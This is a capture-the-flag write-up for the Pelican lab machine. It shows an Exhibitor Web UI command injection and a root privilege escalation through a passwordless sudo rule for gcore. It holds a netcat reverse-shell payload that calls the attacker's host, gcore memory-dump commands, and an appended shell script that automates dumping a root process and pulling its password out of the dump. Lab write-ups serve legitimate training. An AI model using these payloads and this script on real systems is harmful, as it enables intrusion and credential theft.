Pelican

Writeup for Pelican from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.197.98 all

Service Enumeration

HTTP (Port 8080)

HTTP (Port 8081)

The service on this port reports version v1.0.

Exploit

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1.

The steps to exploit it from a web browser:

  • Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON

  • In the “java.env script” field, enter any command wrapped in $() or backticks (``)

  • Payload: $(/bin/nc -e /bin/sh 192.168.49.197 4444 &)

  • Start our listener on the port used in the payload (4444) before committing

  • Click Commit > All At Once > OK.

Proof:

Privesc

gcore

Running LinEnum.sh, we can see that we can run gcore as root without needing a password (the sudo rule is NOPASSWD for /usr/bin/gcore)!

gcore is the gdb utility that dumps the memory of a running process to a core file, so anything the process holds in memory, including credentials it has read, ends up in the dump.

Further down in the output, an interesting SUID file stands out: /usr/bin/password-store.

We can check whether it is running as a process whose memory gcore can dump:

ps aux | grep password-store

With its PID from the ps output (495 here), we can dump it with gcore:

sudo -u root /usr/bin/gcore -a -o /home/charles/output 495

gcore appends the PID to the prefix given with -o, so the dump lands in /home/charles as output.495. We can then move to that directory and run strings over the file to see if there is anything useful in it.

Sure enough, the strings output contains a field '001 Password: root:' with a password on the line beneath it.

Using that password with su gets us root.
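The whole privesc chain, from the sudo check to pulling the credential out of the dump, as an added example for this writeup (not code from the original page). It assumes the same hypothetical environment the writeup describes: sudo permits /usr/bin/gcore NOPASSWD, the root process is named password-store, and the dump prefix is /home/charles/output. The strings step is done with a tr/awk stand-in so it also works on a host without binutils.

```shell
#!/bin/sh
# Added example for this writeup, not code from the original page: the gcore
# privesc chain as reusable functions. Assumed (hypothetical) environment:
# sudo allows /usr/bin/gcore NOPASSWD, the root process is named
# password-store, and the dump prefix is /home/charles/output.

# Step 1: confirm gcore can be run through sudo without a password.
gcore_nopasswd() {
  sudo -n -l 2>/dev/null | grep -q 'NOPASSWD:.*/usr/bin/gcore'
}

# Step 2: PID of the target by exact process name. pgrep -x never matches
# itself, unlike `ps aux | grep`, which also lists the grep.
find_target_pid() {
  pgrep -x "${1:-password-store}" | head -n 1
}

# Step 3: dump the process as root. gcore names the core <prefix>.<pid>;
# print that path so the next step can use it.  $1 = pid, $2 = prefix
dump_process() {
  sudo -n -u root /usr/bin/gcore -a -o "$2" "$1" >/dev/null || return 1
  printf '%s.%s\n' "$2" "$1"
}

# Step 4: strings(1) stand-in for hosts without binutils: every run of four
# or more printable bytes becomes one line.
printable_strings() {
  tr -c '[:print:]' '\n' < "$1" | awk 'length($0) >= 4'
}

# Step 5: the writeup shows the field '001 Password: root:' followed by the
# password on the next line; print that line (empty if the field is absent).
extract_root_password() {
  printable_strings "$1" | grep -A1 -F '001 Password: root:' | sed -n '2p'
}

main() {
  gcore_nopasswd || { echo 'gcore is not NOPASSWD via sudo' >&2; return 1; }
  pid=$(find_target_pid password-store)
  [ -n "$pid" ] || { echo 'password-store is not running' >&2; return 1; }
  dump=$(dump_process "$pid" /home/charles/output) || return 1
  pw=$(extract_root_password "$dump")
  [ -n "$pw" ] || { echo "no root password found in $dump" >&2; return 1; }
  echo "root password recovered from $dump: $pw"
  echo 'now run: su -   (enter the password above at the prompt)'
}

# Run the chain only when asked (RUN_PRIVESC=1), so the file can also be
# sourced for its functions.
if [ "${RUN_PRIVESC:-0}" = 1 ]; then main; fi
```

Run it on the target as RUN_PRIVESC=1 sh privesc.sh. The dump can be large because -a includes all mappings; if the password does not show up, drop the length filter in printable_strings, since a password shorter than four characters would be discarded exactly as strings discards it by default.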
